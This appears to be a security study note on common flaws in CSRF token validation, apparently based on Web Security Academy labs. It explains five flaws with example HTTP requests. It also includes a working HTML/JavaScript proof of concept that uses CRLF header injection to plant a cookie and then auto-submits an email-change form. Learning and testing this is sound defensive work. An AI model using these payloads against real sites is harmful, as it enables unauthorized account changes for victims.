## Common flaws in CSRF token validation
- **Validation of CSRF token depends on request method**. Changing the request method from POST to GET may bypass the validation.
- **Validation of CSRF token depends on token being present**. Removing the CSRF parameter may bypass the validation.
- **CSRF token is not tied to the user session**. CSRF token not tied to specific session, So we can generate new token and use it for any request.
- **CSRF token is tied to a non-session cookie**. CSRF token is tied to another cookie other than the one is used for session handling, We can submit our CSRF and the non-session cookie.
- **CSRF token is simply duplicated in a cookie**. CSRF put in header and body, they should be equal when they being validated. So we can send create CSRF PoC that put token in the header and body.
---
## What is a CSRF token?
A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When issuing a request to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token. Otherwise, the server will refuse to perform the requested action.

When implemented correctly, CSRF tokens help protect against CSRF attacks by making it difficult for an attacker to construct a valid request on behalf of the victim. As the attacker has no way of predicting the correct value for the CSRF token, they won't be able to include it in the malicious request.

---
### Validation of CSRF token depends on request method

Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.
In this situation, the attacker can switch to the GET method to bypass the validation and deliver a CSRF attack:

```http
GET /email/change?email=pwned@evil-user.net HTTP/1.1 
Host: vulnerable-website.com 
Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm
```

---
### Validation of CSRF token depends on token being present

Some applications correctly validate the token when it is present but skip the validation if the token is omitted.
In this situation, the attacker can remove the entire parameter containing the token (not just its value) to bypass the validation and deliver a CSRF attack:

```http
POST /email/change HTTP/1.1 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 25 
Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm 

email=pwned@evil-user.net
```

---
### CSRF token is not tied to the user session

Some applications do not validate that the token belongs to the same session as the user who is making the request. Instead, the application maintains a global pool of tokens that it has issued and accepts any token that appears in this pool.

In this situation, the attacker can log in to the application using their own account, obtain a valid token, and then feed that token to the victim user in their CSRF attack.

---
### CSRF token is tied to a non-session cookie

In a variation on the preceding vulnerability, some applications do tie the CSRF token to a cookie, but not to the same cookie that is used to track sessions. This can easily occur when an application employs two different frameworks, one for session handling and one for CSRF protection, which are not integrated together:

```http
POST /email/change HTTP/1.1 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 68 
Cookie: session=pSJYSScWKpmC60LpFOAHKixuFuM4uXWF; csrfKey=rZHCnSzEp8dbI6atzagGoSYyqJqTz5dv 

csrf=RhV7yQDO0xcq9gLEah2WVbmuFqyOq7tY&email=wiener@normal-user.com`
```

```php
// psudo code 
if( $_POST['csrf'] == get_csrf_from_database('select csrf from session where csrfKey = $_POST["csrfKey"]'))
```

This situation is harder to exploit but is still vulnerable. If the website contains any behavior that allows an attacker to set a cookie in a victim's browser, then an attack is possible. The attacker can log in to the application using their own account, obtain a valid token and associated cookie, leverage the cookie-setting behavior to place their cookie into the victim's browser, and feed their token to the victim in their CSRF attack.

> [!NOTE]
> The cookie-setting behavior does not even need to exist within the same web application as the CSRF vulnerability. Any other application within the same overall DNS domain can potentially be leveraged to set cookies in the application that is being targeted, if the cookie that is controlled has suitable scope. For example, a cookie-setting function on `staging.demo.normal-website.com` could be leveraged to place a cookie that is submitted to `secure.normal-website.com`.
> 

#### PoC
```html
<html>
<body>
  <script>
    fetch('https://0ad2005b030e55dd81813fe900c6006c.web-security-academy.net/?search=asdf%3b+Secure%3b+HttpOnly%3b+%0d%0aSet-Cookie%3a+csrfKey%3dMycXYHESHX9JcAGkqdqCa0RkwTC72Dh2; SameSite=None', { // There was endpoint enable us to set-cookie as we want.
      method: 'GET',
      credentials: 'include',
      mode: 'no-cors'
    }).then(() => {
    setTimeout(() => {
      document.forms[0].submit();
    }, 500);
  });
  </script>
  <form action="https://0ad2005b030e55dd81813fe900c6006c.web-security-academy.net/my-account/change-email"
    method="POST">
    <input type="hidden" name="email" value="hello@gmail.com" />
    <input type="hidden" name="csrf" value="2MDfIQQInGIQr3fzfdNgKTJhkPJmwvzr" />
    <input type="submit" value="Submit request" />
  </form>
</body>

</html>
```

---
### CSRF token is simply duplicated in a cookie

In a further variation on the preceding vulnerability, some applications do not maintain any server-side record of tokens that have been issued, but instead duplicate each token within a cookie and a request parameter. When the subsequent request is validated, the application simply verifies that the token submitted in the request parameter matches the value submitted in the cookie. This is sometimes called the "double submit" defense against CSRF, and is advocated because it is simple to implement and avoids the need for any server-side state:

```http
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68 
Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa 

csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&email=wiener@normal-user.com
```
In this situation, the attacker can again perform a CSRF attack if the website contains any cookie setting functionality. Here, the attacker doesn't need to obtain a valid token of their own. They simply invent a token (perhaps in the required format, if that is being checked), leverage the cookie-setting behavior to place their cookie into the victim's browser, and feed their token to the victim in their CSRF attack.